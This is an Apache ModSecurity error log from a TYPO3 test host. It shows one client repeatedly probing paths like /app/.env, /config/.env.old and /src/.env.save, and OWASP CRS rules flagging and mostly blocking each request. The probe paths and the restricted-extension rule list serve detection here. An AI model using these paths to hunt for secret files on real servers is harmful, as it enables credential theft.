[Sat Nov 22 00:05:31.812261 2025] [:error] [pid 243343] [client 3.9.175.83:42800] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSDwO4NKGNllPFPT2VHklwAAAAY"]
[Sat Nov 22 00:05:36.677232 2025] [:error] [pid 243340] [client 3.9.175.83:44804] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSDwQJeLEhOLAInnw0NqfgAAAAA"]
[Sat Nov 22 00:05:36.677438 2025] [:error] [pid 243340] [client 3.9.175.83:44804] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSDwQJeLEhOLAInnw0NqfgAAAAA"]
[Sat Nov 22 00:05:36.678513 2025] [:error] [pid 243340] [client 3.9.175.83:44804] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSDwQJeLEhOLAInnw0NqfgAAAAA"]
[Sat Nov 22 00:05:36.678696 2025] [:error] [pid 243340] [client 3.9.175.83:44804] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.old"] [unique_id "aSDwQJeLEhOLAInnw0NqfgAAAAA"]
[Sat Nov 22 00:05:36.729843 2025] [:error] [pid 243344] [client 3.9.175.83:44992] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSDwQBprncRmilB7cHSolAAAAAg"]
[Sat Nov 22 00:05:36.730010 2025] [:error] [pid 243344] [client 3.9.175.83:44992] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSDwQBprncRmilB7cHSolAAAAAg"]
[Sat Nov 22 00:05:36.730215 2025] [:error] [pid 243344] [client 3.9.175.83:44992] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSDwQBprncRmilB7cHSolAAAAAg"]
[Sat Nov 22 00:05:36.730439 2025] [:error] [pid 243344] [client 3.9.175.83:44992] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aSDwQBprncRmilB7cHSolAAAAAg"]
[Sat Nov 22 00:05:36.748260 2025] [:error] [pid 243341] [client 3.9.175.83:44968] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSDwQAqyqiDG5tICQX6nogAAAAE"]
[Sat Nov 22 00:05:36.748484 2025] [:error] [pid 243341] [client 3.9.175.83:44968] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSDwQAqyqiDG5tICQX6nogAAAAE"]
[Sat Nov 22 00:05:36.748656 2025] [:error] [pid 243341] [client 3.9.175.83:44968] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSDwQAqyqiDG5tICQX6nogAAAAE"]
[Sat Nov 22 00:05:36.878316 2025] [authz_core:error] [pid 243342] [client 3.9.175.83:44994] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Nov 22 00:05:37.094153 2025] [authz_core:error] [pid 243398] [client 3.9.175.83:45190] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Nov 22 00:05:37.107465 2025] [:error] [pid 243390] [client 3.9.175.83:44942] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aSDwQbuOi_dqsgv2AxsAWQAAAAM"]
[Sat Nov 22 00:05:37.107703 2025] [:error] [pid 243390] [client 3.9.175.83:44942] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aSDwQbuOi_dqsgv2AxsAWQAAAAM"]
[Sat Nov 22 00:05:37.107898 2025] [:error] [pid 243390] [client 3.9.175.83:44942] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.save"] [unique_id "aSDwQbuOi_dqsgv2AxsAWQAAAAM"]
[Sat Nov 22 00:05:37.146148 2025] [:error] [pid 243343] [client 3.9.175.83:45184] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSDwQYNKGNllPFPT2VHkmAAAAAY"]
[Sat Nov 22 00:05:37.146413 2025] [:error] [pid 243343] [client 3.9.175.83:45184] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSDwQYNKGNllPFPT2VHkmAAAAAY"]
[Sat Nov 22 00:05:37.146607 2025] [:error] [pid 243343] [client 3.9.175.83:45184] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSDwQYNKGNllPFPT2VHkmAAAAAY"]
[Sat Nov 22 00:05:37.457421 2025] [:error] [pid 243341] [client 3.9.175.83:45228] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aSDwQQqyqiDG5tICQX6nowAAAAE"]
[Sat Nov 22 00:05:37.457646 2025] [:error] [pid 243341] [client 3.9.175.83:45228] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aSDwQQqyqiDG5tICQX6nowAAAAE"]
[Sat Nov 22 00:05:37.457840 2025] [:error] [pid 243341] [client 3.9.175.83:45228] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aSDwQQqyqiDG5tICQX6nowAAAAE"]
[Sat Nov 22 00:05:45.491020 2025] [:error] [pid 243344] [client 3.9.175.83:47754] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSDwSRprncRmilB7cHSolQAAAAg"]
[Sat Nov 22 00:05:45.491189 2025] [:error] [pid 243344] [client 3.9.175.83:47754] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSDwSRprncRmilB7cHSolQAAAAg"]
[Sat Nov 22 00:05:45.491405 2025] [:error] [pid 243344] [client 3.9.175.83:47754] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSDwSRprncRmilB7cHSolQAAAAg"]
[Sat Nov 22 00:05:45.491585 2025] [:error] [pid 243344] [client 3.9.175.83:47754] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.old"] [unique_id "aSDwSRprncRmilB7cHSolQAAAAg"]
[Sat Nov 22 00:05:45.511837 2025] [authz_core:error] [pid 243340] [client 3.9.175.83:47752] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Nov 22 00:05:45.604149 2025] [:error] [pid 243342] [client 3.9.175.83:47788] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aSDwSSbqTrlsHApMKqWIjQAAAAI"]
[Sat Nov 22 00:05:45.604381 2025] [:error] [pid 243342] [client 3.9.175.83:47788] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aSDwSSbqTrlsHApMKqWIjQAAAAI"]
[Sat Nov 22 00:05:45.604580 2025] [:error] [pid 243342] [client 3.9.175.83:47788] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.save"] [unique_id "aSDwSSbqTrlsHApMKqWIjQAAAAI"]
[Sat Nov 22 00:05:45.946037 2025] [:error] [pid 243343] [client 3.9.175.83:47868] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSDwSYNKGNllPFPT2VHkmQAAAAY"]
[Sat Nov 22 00:05:45.946196 2025] [:error] [pid 243343] [client 3.9.175.83:47868] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSDwSYNKGNllPFPT2VHkmQAAAAY"]
[Sat Nov 22 00:05:45.946411 2025] [:error] [pid 243343] [client 3.9.175.83:47868] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSDwSYNKGNllPFPT2VHkmQAAAAY"]
[Sat Nov 22 00:05:45.946592 2025] [:error] [pid 243343] [client 3.9.175.83:47868] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aSDwSYNKGNllPFPT2VHkmQAAAAY"]
[Sat Nov 22 00:05:46.005095 2025] [:error] [pid 243390] [client 3.9.175.83:47800] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aSDwSruOi_dqsgv2AxsAWgAAAAM"]
[Sat Nov 22 00:05:46.005453 2025] [:error] [pid 243390] [client 3.9.175.83:47800] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aSDwSruOi_dqsgv2AxsAWgAAAAM"]
[Sat Nov 22 00:05:46.005707 2025] [:error] [pid 243390] [client 3.9.175.83:47800] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aSDwSruOi_dqsgv2AxsAWgAAAAM"]
[Sat Nov 22 00:05:46.018899 2025] [authz_core:error] [pid 243398] [client 3.9.175.83:48018] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/src
[Sat Nov 22 00:05:46.026601 2025] [:error] [pid 243344] [client 3.9.175.83:48058] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSDwShprncRmilB7cHSolgAAAAg"]
